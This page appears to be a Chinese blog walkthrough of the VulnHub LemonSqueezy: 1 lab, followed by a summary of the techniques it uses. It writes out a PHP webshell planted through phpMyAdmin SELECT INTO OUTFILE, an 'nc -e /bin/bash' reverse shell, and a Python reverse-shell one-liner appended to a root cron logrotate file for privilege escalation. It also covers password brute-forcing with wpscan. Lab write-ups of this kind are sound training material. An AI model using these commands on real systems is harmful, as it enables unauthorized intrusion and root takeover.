当前位置: 首页 > news >正文

LemonSqueezy: 1靶场渗透

LemonSqueezy: 1

来自 <LemonSqueezy: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.225

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.225

访问80端口开放的http服务

4,爆破枚举扫描网站存在的子目录

dirsearch -u http://192.168.23.225 -x 403,404

注意到/wordpress.tar.gz,访问一下下载这个压缩包

网站存在wordpress和phpmyadmin,非常经典的架构

5,使用wordpress的专属扫描工具

wpscan --url http://192.168.23.225/wordpress/ --api-token

wpscan --url http://192.168.23.225/wordpress/ -U orange -P /usr/share/wordlists/rockyou.txt --api-token 

orange/ginger尝试登录,然后又得到一个密码,应该是phpmyadmin的密码 n0t1n@w0rdl1st!

http://lemonsqueezy/wordpress/wp-admin/post.php?post=5&action=edit

6,尝试登录phpmyadmin

orange/n0t1n@w0rdl1st!

成功登录phpmyadmin,在phpmyadmin的SQL页面,输入以下命令:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"

从而创建了backdoor.php文件访问该文件:

http://192.168.23.225/wordpress/backdoor.php?cmd=whoami

然后再编写payload getshell:

http://192.168.23.225/wordpress/backdoor.php?cmd=nc%20-e%20/bin/bash%20192.168.23.182%204444

访问这个URL,与此同时kali linux要打开对4444端口的监听

nc -lvvp 4444

7,使用python创建一个可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

8,信息收集查看定时任务

cat /etc/crontab

查看其中一个文件

cat /etc/logrotate.d/logrotate

这个文件能够执行系统命令,并且能够被所有用户读写执行

9,将python反弹shell的命令写入到/etc/logrotate.d/logrotate

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.23.182",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' >> /etc/logrotate.d/logrotate

与此同时kali 使用netcat打开对1234端口的监听

nc -lvvp 1234

成功提权成为root,并且get到flag

一、信息收集与初步探测

  1. 主机发现与端口扫描
  • 使用 netdiscover 扫描局域网内的活跃主机,确定靶机IP(如 10.1.1.14967
  • 通过 nmap 进行全端口扫描(nmap -sS -sV -p-),发现开放端口(如80/http、3306/mysql),识别服务版本(如Apache 2.4.25)67
  1. Web路径枚举与CMS识别
  • 使用 gobuster 或 dirsearch 扫描Web目录,发现 /wordpress/phpmyadmin 等敏感路径67
  • 通过 Wappalyzer 或手动分析页面特征,识别WordPress框架,并利用 wpscan 枚举用户(如 orange)及爆破密码(如 n0t1n@w0rdl1st!67
  1. 子域名与配置文件分析
  • 修改 /etc/hosts 文件解析域名(如 lemonsqueezy),解决页面加载异常问题6
  • 发现备份文件(如 backupPassword)或默认配置文件(如 settings.php),提取数据库凭证47

二、漏洞利用与初始访问

  1. SQL注入与WebShell写入
  • 通过phpMyAdmin登录后执行SQL语句,利用 SELECT ... INTO OUTFILE 写入WebShell(如 shell1.php),实现命令执行7
  • 触发反向Shell:通过WebShell执行 nc -e /bin/bash 或使用 Metasploit 的 wp_admin_shell_upload 模块获取低权限Shell(如 www-data47
  1. WordPress插件与主题漏洞
  • 利用后台编辑主题功能插入恶意PHP代码(如反弹Shell),或通过上传恶意插件获取控制权47
  1. 文件包含与命令注入
  • 发现存在文件包含漏洞的脚本(如 /Challenge/include.php),通过路径遍历读取敏感文件(如 /etc/passwd)或执行系统命令57

三、权限提升与横向移动

  1. 定时任务与Logrotate提权
  • 分析 /etc/crontab 发现以root权限执行的定时任务(如日志轮转),修改 /etc/logrotate.d/logrotate 文件插入提权命令(如复制SUID权限的Bash)7
  • 执行 chmod 4777 /var/www/html/wordpress/bash 后,通过 bash -p 获取root权限7
  1. SUID/SGID滥用
  • 使用 find / -perm -4000 2>/dev/null 查找具有SUID权限的可执行文件(如 findvim),通过参数注入或环境变量劫持提权24
  1. 敏感文件篡改
  • 发现全局可写的 /etc/shadow,直接替换root用户密码哈希(如使用 openssl passwd 生成新密码)37

相关文章:

  • OpenCV 图形API(21)逐像素操作
  • Kafka的索引设计有什么亮点
  • 利用pytorch对加噪堆叠自编码器在MNIST数据集进行训练和验证
  • linux-添加开机自启动指定脚本
  • #关于require 与 import 相关了解
  • AI爬虫?爬!(附加mcp实践教程)
  • 第十五届蓝桥杯国赛题 代码量统计-困难 解题思路
  • 【蓝桥杯】搜索算法:DFS/BFS
  • R Excel 文件:高效数据处理与可视化工具的完美结合
  • 图形裁剪算法
  • 深度学习天崩开局
  • docker 安装 awvs15
  • 计算机面试八股(自整)
  • 历年跨链合约恶意交易详解(四)——Chainswap20210711
  • 什么是EXR透视贴图 ?
  • 【云计算】打造高效容器云平台:规划、部署与架构设计
  • Linux第四章练习
  • 【Docker基础】--查阅笔记1
  • C语言中单链表操作:查找节点与删除节点
  • 滑动窗口例题
  • 网站建设管理与维护/搜索引擎优化有哪些要点
  • 棠下网站建设/南京百度seo公司
  • 百度域名注册与解析服务/网站优化服务
  • 网站编辑能在家做/广州软文推广公司
  • 网站开发工具/想做网站找什么公司
  • 珠海市企业网站制作平台/域名注册万网